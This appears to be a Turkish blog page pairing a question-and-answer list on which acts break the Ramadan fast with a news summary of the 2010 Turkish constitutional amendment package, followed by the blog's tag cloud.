CEVAP Öpmek orucu bozmaz. Cünüp olma ihtimali varken öpüşmek mekruh olur. Öpüşürken meni gelirse cünüp olunur ve oruç bozulur. Meninin dışındaki akıntılar, mezi, vedi denilen akıntılar, erkeği de kadını da cünüp etmez. Cünüp etmeyince oruç da bozulmaz.

Sual: Yıkanırken kulağıma sabunlu su kaçtı, orucum bozuldu mu?
CEVAP Bozulmadı.

Sual: Denize girince oruç bozuluyor değil mi?
CEVAP Denize girdiği için değil, su girecek deliklerden içine su kaçtığı için oruç bozulur. Eğer su girmezse oruç bozulmaz.

Soru: İftar için yiyecek birşeyler hazırlarken parmağımı kestim. Birkaç damla aktı. Orucum bozuldu mu?
CEVAP Hayır kan çıkmakla, kan aldırmakla oruç bozulmuş olmaz.
Soru: Şükür secdesi nasıl olur?
CEVAP Kendisine nimet gelen veya bir dertten kurtulan kimsenin, Allahü teâlâ için şükür secdesi yapması müstehaptır. Şükür secdesi, tilavet secdesi gibidir. Şükür secdesi yapacak olan, niyet edip, secdeye gidince, önce Elhamdülillah der. Sonra secde tesbihini okur. Sonra Allahü ekber der ve ayağa kalkar..

Sual: Bacağına ameliyatla protez takılan bir hastanın ramazan ayı içerisinde göründüğü kadarı ile bir ağrısı ve sızısı olmadığı takdirde namaz kılıp oruç tutmasına engel teşkil eder mi?
CEVAP Teşkil etmez. Ayakta kılamazsa oturarak kılar.

Sual: Traş olurken kanayan yere kan taşı sürmek orucu bozar mı?
CEVAP Bozmaz.

Sual: Sabah yatarken susadığımı hissettim ve saatime baktım saati 05.10 geçiyor olarak gördüm. Dikkatli olarak baktığıma eminim. Suyumu içtim ve gayri ihtiyari saate bir baktımki saat 06.10 çok üzüldüm. Orucum bozuldu mu?
CEVAP Evet bozuldu. Sizin kasdınız olmadığı için sadece kaza gerekir.

Sual: Astım hastası bir kimse hastalığından dolayı ilaç kullanma mecburiyeti doğunca ilacı kullanınca oruç bozuluyor mu? Kaza veya kefaret gerekiyor mu?
CEVAP Evet bozuluyor. Sadece kaza gerekir.

Sual: Kadın hastalıklarında bir çubukla hap veriliyor, fitil veriliyor. Bunlar guslü gerektirir mi, orucu bozar mı?
CEVAP Genelde guslü gerektirmez. Çok hassas olanlarda zevk almaya sebep olursa gerektirebilir. Gündüz kullanılırsa oruç bozulur, kaza gerekir. Pamuk bile konsa, pamuk tamamen içeri girerse oruç bozulur. Yaş parmak girse oruç bozulur.

Sual: Salı günü kaza orucu tutmak için pazartesi akşamı saat 24.00 te kaza orucu niyeti ile yemek yedim ertesi gün niyet etmediğimi hatırladım bu kaza orucu sahih oldu mu?
CEVAP Kaza orucuna niyetin ilk vakti, akşam ezanından başlar, imsak vaktine kadar devam eder. Siz gece niyet ettiğinize göre orucunuz sahihtir.

Sual: Kaza orucu tutarken en son tutamadığım ramazan orucuna diye niyetlenmem yeterli mi?
CEVAP Evet yeterlidir.
Sual: Ayak tırnağımda yara var ve bu yaradan gün içerisinde sarı su cerahat ve bazen de kan geliyor ve tırnak arasında birikiyor, bunlar tekrar içeri girer mi yani bu durum orucu bozar mı?
CEVAP Orucu bozmaz.

Sual: Sağlık ocağında kulak yıkatmak orucu bozar mı?
CEVAP Suyun içine bir ilaç konuyor, konmazsa orucu bozmaz. Konursa bozar.

Sual: Akşam yemek yerken yarın kaza orucu tutayım diye kalbinden geçirmiş hatta hanımına da söylemiş ama diliyle de niyet etmeyi unutmuş. Şimdi oruca devam mı edecek?
CEVAP Yarın tutmaya akşamdan karar vermişse, yani gece yemeğe kalksam da kalkmasam da yarın oruç tutacağım diye düşünmüşse, niyet etmiş olur. Yemek yemesi veya gece kalkması şart değildir.

Sual: Kaza orucuna niyet eden birisi öğleden önce isteyerek bozarsa bile kefaret gerekmez diye biliyorum. Hükmünü bildirir misiniz?
CEVAP Evet öyle. Fakat özürsüz bozunca günah işlemiş olur. Öğleden sonra da bozsa aynıdır.

Sual: Toplumda yaygın bir şekilde söylenen -özürlü, zihinsel özürlü vs gibi- sözlerin dinen bir sakıncası var mıdır? Özürlü demek uygun değil gibi geliyor..
CEVAP Sakata sakat demenin ne mahzuru olur ki? Hiç bir mahzuru yok. Deliye deli denir. Özürlüye özürlü denir.

Sual: Biz iki kardeşiz, annem bize hamileyken oruçlarını tutamamış. o zamanki ramazan imsakiyelerini saklayıp daha sonra (yıllar sonra) o imsakiyelere bakarak sırayla tutmuş. Niyet ederken bunlara göre niyet etmiş. Bunları tekrar tutması gerekiyor mu?
CEVAP Çok iyi olmuş.Tekrar tutması gerekmez. Fakat imsakiye saklamasa da ilk kazaya kalan diyerek de tutabilirdi. Namazları da öyle kaza etmek gerekir. İlk kılınan kılınınca ondan sonraki ilk olur.

Sual: İstemeyerek yağmur suyu ağzımıza kaçsa oruca zararı olur mu?
CEVAP Bozulur.

Sual: Hastanede test için kan verirken enjektörü sokmadan önce deriye alkol sürüyorlar ve çıkarttıktan sonra iğne deliğinin üzerine alkollü pamuk koyuyorlar. Bunun oruca bir zararı var mıdır?
CEVAP Hayır oruca zararı olmaz

Sual: Oruçlu iken kulaktan kulak damlası dökersek oruç bozulur mu?
CEVAP Evet bozulur, göze damla bozmaz da kulağa damla orucu bozar.

Sual: Ben diabet hastasıyım ve oruç tutacağım inşallah. Benim sorum kan alıp ölçü aletine koyup şekerimi ölçmem orucu bozar mı? Yani kan dediğim şırınga filan değil belki 3 damla. Çünki iş için yoldayım ve şekerimin düşmemesi icab ediyor.
CEVAP Kan aldırmak orucu bozmaz.

Sual: Arı sokarsa oruç bozulur mu?
CEVAP Bozulmaz.

Sual: Deriyi çizerek yapılan çiçek aşısı orucu bozar mı?
CEVAP Bozmaz. Tentürdiyot gibidir.

Sual: Sigara dumanı az da olsa, teneffüs edilince orucu bozar mı?
CEVAP Zaruretsiz teneffüs edilince bozar.

Sual: Bir odada ne kadar sigara dumanı olursa orucu bozar?
CEVAP Rahatsız edecek kadar duman varsa oruç bozulur.

Sual: Kadın geceden niyet ettiği orucu öğleyin bozsa, öğleden sonra da adet görse, kaza mı lazımdır?
CEVAP Kaza lazımdır.

Sual: Viks ve başka merhem sürmek orucu bozar mı?
CEVAP Bozmaz.

Sual: Astım tabletinin gazını teneffüs etmek orucu bozar mı?
CEVAP Sigara dumanı gibi orucu bozar.

Sual: Astımlıya kriz halinde verilen ilaç, keffareti gerektirir mi?
CEVAP Gerektirmez. Hastalık özrüdür, kaza gerekir.

Sual: Evi haşere için ilaçladım. Bu ilacı teneffüs orucu bozar mı?
CEVAP Az olursa bozmaz.

Sual: Şekersiz ciklet çiğnemek orucu bozar mı?
CEVAP Mekruhtur. Çiğnememelidir. Günümüzdeki sakızları çiğnemek, daha önceden çüğnenmiş bile olsa oruzu bozar.

Sual: Oksijen gazı, orucu bozar mı?
CEVAP Bozmaz

Sual: Takvime göre, sahuru yanlışlıkla 10 dakika geciktirdim. Orucum sahih oldu mu?
CEVAP Kaza gerekir.

Sual: Dayanamayıp orucunu bozana kaza mı gerekir?
CEVAP Dayanamıyana, kaza gerekir.

Sual: Oruç bozulunca (Benim oruca el-Fatiha) demek günah mıdır?
CEVAP Evet. Fatihaya hakaret olur.

Sual: Hasta, ağzına sık sık su alsa orucu bozulur mu?
CEVAP Yutulmadıkça bozulmaz.

Sual: Hasta, su buharını teneffüs etse orucu bozulur mu?
CEVAP Ciğerlere giderse bozar.

Sual: Burnu kanayıp, genizden mideye giderse, oruç bozulur mu?
CEVAP Evet.

Sual: İğne vurmak şafiide de orucu bozar mı?
CEVAP Bozar.

Sual: Kulağı pamukla veya su ile temizlemek, orucu bozar mı?
CEVAP Bozmaz.

Sual: Kulaktaki pamuk, delik zardan içeri girse, orucu bozar mı?
CEVAP Hayır.

Sual: Kulağa kaçan sabunlu su, orucu bozar mı?
CEVAP Bozmaz.

Anayasa degisikliği neleri kapsiyor?

Anayasa Mahkemesi’nin “kısmi iptal” kararı ile Anayasa değişiklik paketinin önü açıldı. Paket, 12 Eylül’de halkoyuna sunulacak. Ve eğer geçerse, bazı kişilerin hayatlarında “somut” değişikliklere neden olacak.

İşte bazı örnekler;

Van Savcısı Sarıkaya’ya mesleğe dönme imkanı

Değişiklik paketi ile Hakimler ve Savcılar Yüksek Kurulu tarafından meslekten ihraç edilenlere yargı yoluna başvurma olanağı getiriliyor. Bu konuda herkesin hatırladığı yakın dönemde yaşanmış olay, Van eski Savcısı Ferhat Sarıkaya’nın meslekten ihracı. Sarıkaya, 9 Kasım 2005'te Şemdinli'deki patlama sonrası meydana gelen olaylar üzerine hazırladığı iddianamede, olaylar nedeniyle tutuklanan astsubay Ali Kaya hakkında "tanırımı, iyi çocuktur" diyen dönemin Kara Kuvvetleri Komutanı Orgeneral Yaşar Büyükanıt ile birçok general ve üst düzey subayın da adını iddianameye dahil etmişti. Sarıkaya 2006’da HSYK kararı ile meslekten ihraç edilmişti.

Aysel Tuğluk ve Ahmet Türk’e aktif siyasi olasılığı

Anayasa Paketi, partisinin kapatılmasına neden olan milletvekilinin üyeliğinin düşmemesini de öngörüyor. Bu konudaki son örnek, DTP’nin kapatılması. Anayasa Mahkemesi’nin DTP’nin kapatılmasına ilişkin verdiği karar ile, Türk ve Tuğluk, milletvekili sıfatını kaybetmişti. Anayasa değişikliğinin geçmesi halinde, iki eski vekil Anayasa mahkemesine başvurup lehte düzenleme isteyerek milletvekilliklerinin iadesini talep edebilecekler.

İskender Pala gibi binlerce eski subay ve astsubaya yeniden ordu yolu

Anayasa değişiklik paketinin geçmesi halinde, Yüksek Askeri Şura kararı ile TSK’dan çıkarılanlara da yargı yolu açılıyor. Bu konudaki sembol isimlerden biri de, yazar İskender Pala. Pala, “iki darbe arasında” adını taşıyan kitabında, Türk Silahlı Kuvvetleri’nden hangi gerekçe ve şartlarda ihraç edildiğini, buna karşı verdiği hukuk mücadelesini anlatmıştı. Yeni Anayasa değişikliği ile, İskender Pala durumundaki, ordudan ihraç edilmiş binlerce astsubay ve subay dava açabilecek. Bunlardan durumu uygun bulunanların mesleğe dönmelerinin de önü açılacak. Ancak bu sürecin nasıl işleyeceğine ilişkin, yeni yasal düzenlemeler de yapılması gerekiyor. Yeni yasal düzenlemelerde göreve iade edilecek kişinin hangi rütbe ve kıdemden göreve döneceği, tazminat olasılığı gibi unsurların yer alması gerekecek.

Kenan Evren’e yargı yolu açılıyor

Pakette, 12 Eylül dönemindeki Milli Güvenlik Konseyi üyeleri ile bu dönemde kurulan hükümetler ve Danışma Meclisi’nde görev alanların yargılanmasını önleyen geçici 15. madde yürürlükten kaldırılacak. Böylece, 12 eylül darbesinin sorumluları, üst düzey yetkilileri için yargı yolu açılmış olacak.

Şehit ailelerine, gazilere, kadınlara, çocuk ve özürlülere daha fazla hak

Anayasa değişikliğinin getirdiği bir başka unsur, “pozitif ayrımcılığın” artık Türkiye Anayasası’nın bir parçası haline getirilmesi. Bu çerçevede, ülkesi için hayatını kaybetmiş şehitlerin ailelerine, iş göremez hale gelmiş gazilere, kadınlar, çocuklar, yaşlılar ve özürlülere yeni hakların önü açıldı. Bu kesimlere yasalarla tanınacak yeni hakların, Anayasa’nın “eşitlik” ilkesine takılarak, iptal edilmesi olasılığı ortadan kaldırıldı.

Vergi daireleri yurtdışına çıkış yasağı koyamayacak

Yeni değişiklikler ile, kişisel verilerin korunması Anayasal güvenceye alınacak. Daha önce, vergi borcu nedeniyle, bizzat vergi dairesi tarafından yurtdışına çıkış yasağı konulabiliyordu. Şimdi bu konuda, yani yurtdışına çıkış yasağı konusunda karar, sadece hakimler tarafından verilecek.

Memurlar toplu sözleşme yapabilecek

Anayasa değişikliği, çalışma hayatında da çok önemli değişiklikler getiriyor. Bundan böyle işçiler, aynı iş kolunda birden fazla sendikaya üye olabilecekler. Memurlara ve diğer kamu görevlilerine toplusözleşme yapma hakkı tanınacak, memurlara verilen uyarma ve kınama cezaları yargı denetimine açılacak. Greve katılan işçilerin ve sendikanın kasıtlı veya kusurlu hareketleri sonucu grev uygulanan işyerinde neden oldukları maddi zarardan sendika sorumlu tutulamayacak. Siyasi amaçlı grev ve lokavt, dayanışma grevi ve lokavtı, genel grev ve lokavt, işyeri işgali, iş yavaşlatma, verim düşürme ve diğer direnişlere ilişkin yasaklar kaldırılacak.

Ombudsmanlık kuruluyor

Yeni değişiklikler ile, ‘Kamu Denetçiliği Kurumu’ (ombudsmanlık) oluşturulacak.

Askerlere sivil yargı yolu

Askerlere bazı suçlarda sivil yargı yolu açılacak. Siviller, savaş hali dışında askeri mahkemelerde yargılanamayacak.

Normal vatandaş, Anayasa Mahkemesi’ne başvurabilecek

Anayasa Mahkemesi Anayasa değişiklikleri kapsamında, yeniden yapılandırılacak. Halen 11 asıl 4 yedek üyeli Anayasa Mahkemesi, 17 asıl üyeden oluşacak. Cumhurbaşkanı’nın yanı sıra Meclis de 2 üyeyi, Sayıştay Genel Kurulu’nun gösterdiği 3’er aday arasından, 1 üyeyi ise baro başkanlarının avukatlar arasından göstereceği 3 aday arasından gizli oyla seçecek. Mevcut durumda, süresiz (kaç yaşında seçildiğine bakılmaksızın emeklilik yaşı olan 65 yaşına kadar) olan Anayasa Mahkemesi üyeliği 12 yıl ile sınırlandırılacak. 12 yıldan önce yaş sınırını dolduran üye emekliye ayrılacak. Ve en önemli değişiklik olarak; Artık sıradan vatandaşlar da Anayasa Mahkemesi’ne başvurabilecek. Daha önce sadece mahkemeler, ana muhalefet partisi ya da TBMM’de 110 milletvekili topluca Anayasa Mahkemesi’ne başvurabiliyordu.

Genelkurmay başkanı da, Meclis Başkanı da Yüce Divan’da yargılanabilecek

Meclis Başkanı, Genelkurmay Başkanı, kuvvet komutanları da Yüce Divan’da yargılanacak.

HSYK’nın yapısı: HSYK’nın halen 7 olan üye sayısı 22’ye, 5 olan yedek üye sayısı ise 12’ye çıkarılacak. HSYK, 3 daire halinde çalışacak. HSYK’nın mevcut asıl ve yedek üyelerinin görevleri, seçildikleri sürenin sonuna kadar devam edecek.

Etiketgiller

.dll (2) .NET (1) #googleplus (1) +1 butonu (1) a ve an neye göre belirlenir (1) açıklama (1) Adsense (1) Adtech (1) Afrikalı zenci bir çocuğun bu şiiri (1) algorithm (1) antivirüs (1) apple (4) arkadaş ekleme (1) Arkadaş-Sevgili Şiiri (1) asus notebook menteşe kırıldı (1) azize nur (1) bakmak (1) basit (3) Basit Css Ornegi (1) basit örnek (3) bedava (2) bedava internete girmek (1) bilgisayar mühendisi (1) bilinçaltı (1) biyografisi (2) blogda değişiklikler (1) blogger kod çevirici (1) blogger temaları (1) blogspot için widgetler (1) boost hack (2) bot yapma (1) bozuk zil sesi (1) btk yasağı (1) c de fonksiyonlar (1) c programlama dili (1) C++ hesap makinesi kodları (1) c++ sayı tahmin oyunu (basit) (1) Cd key already in use (1) CD key değiştirme (1) counter strike cd key sorunu (1) crack (2) cs cd key değiştirme işlemi (1) Css dersleri (1) database (2) ders notu (1) developer (1) dns ayarları (1) doğum günü (1) dowland (1) download (7) e-ticaret (1) Eklentisi (15) ekran kararıyor (1) en son bölüm (1) engeli kaldırmak (1) english grammar (1) English Proverbs (1) error (1) Ezel dizisi (1) f8 konferansı (1) facebook (7) facebook giremiyorum (2) Facebook Hesabım kapatıldı (1) facebook hesabıma ulaşamıyorum (1) facebook istatistik (1) facebook neden açılmıyor (1) facebook tarzı (1) facede ilginç profil resmi (1) file_get_contents (1) flash etiket bulutu (1) Follower Bug (1) Friend Requests Blocked (1) full (3) galaxy s3 (2) galaxy s3 ayarları (1) galaxy s3 flash apk (1) galaxy s3 flash player (1) Galaxy S3 Zil Sesi Değiştirme (1) gizem doğan facebook (1) go to imageshack.us to register (1) Google (5) Google +1 buton (1) google plus (1) google projeleri (2) haberleri (3) hack (2) harici harddisk açılmıyor (1) Hayat Hikayesi (1) hepsiniseninicinyaptim.tumblr.com (1) Hesaba Ulaşılamıyor (1) hileleri (2) how to InnoDB (1) html alt satıra geçme kodu (1) html kod çeviriçi (1) html kodu (1) html5 (1) Ingilizce fillerin 2. ve 3. halleri (1) InnoDB (1) ilginç resimler (1) ilk apple bilgisayar (1) inci sözlük (1) ingilizce sözler (1) ingilizcede (1) iphone (3) iphone 5 (2) iş takip (1) iş takip programı (1) iş takip programı full (1) iş takip programı ücretsiz (1) iş takip programları (1) java (2) karakter sorunu (1) kıbrıs (2) kız arkadaş (1) kimdir (5) kimler oynuyor (1) klasör gizleme (1) kpss (1) kpss çalındı mı (1) kpss soruları (1) Mark Zuckerberg (3) mp3 (3) mp3 kesme programı (1) mysql (2) nasıl açılır (2) nasıl çalışır (3) nasıl kurulur (2) nasıl yapılır (4) nasil (3) ne (7) ne demek (10) ne işe yarar (10) ne zaman (8) neden (4) nedir (16) Need For Speed World Update Sorunu (1) nfs (3) nfs world (1) Nikola Tesla (1) online izle (1) orucu bozan haller (1) öss (2) ösym (3) Photoshop dosyalarinda psd onizleme (1) php (4) programı (3) resimli anlatım (2) resmi (3) samsung (5) samsung galaxy s3 (4) samsung galaxy s3 sorunları (1) Samsung Galaxy S3 Zil Sesi Değiştirme (1) seditio (6) seditio corehacks (1) seditio destek sitesi (1) Seditio eklenti (4) Seditio Flash Etiket Bulutu (2) seo (1) serial (4) sistem gereksinimleri (3) sorunu (7) sözler (2) sözleri (4) sql server 2008 kurulumu (1) Steve Jobs (2) Steve Jobs kimdir (1) survivor taner (1) şiirleri (2) şişmanlama (1) şuuraltı mesajları (1) tavsiye (2) telefon (9) torrent (2) troubleshoot3r (2) troubleshooter (21) türkçe (3) Türkçe Altyazı (1) twitter (1) utf-8 (2) web tasarım (1) web tasarım adana (1) windows 7 (3) Yılmaz ilker şahin (2) zend framework (1)